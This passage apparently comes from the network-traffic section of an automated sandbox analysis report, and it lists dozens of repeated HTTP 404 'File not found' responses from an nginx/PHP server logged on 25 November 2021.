        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:35 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:35 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:36 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:36 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:37 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:37 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:38 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:38 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:39 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:39 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:40 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:40 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:41 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:41 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:42 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:42 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:43 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:43 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:44 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:44 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:45 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:45 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:46 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:46 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:47 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:47 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:48 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:48 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:49 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:49 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:50 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:50 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:51 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:51 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:52 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:52 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:53 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:53 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:54 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:54 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:55 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:55 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:56 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:56 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:57 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:57 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:58 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:58 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:59 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:50:59 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:00 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:00 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:01 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:01 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:02 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:02 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:03 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:03 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:04 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:04 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:05 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:05 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:06 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:06 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:07 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:07 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:08 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:08 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
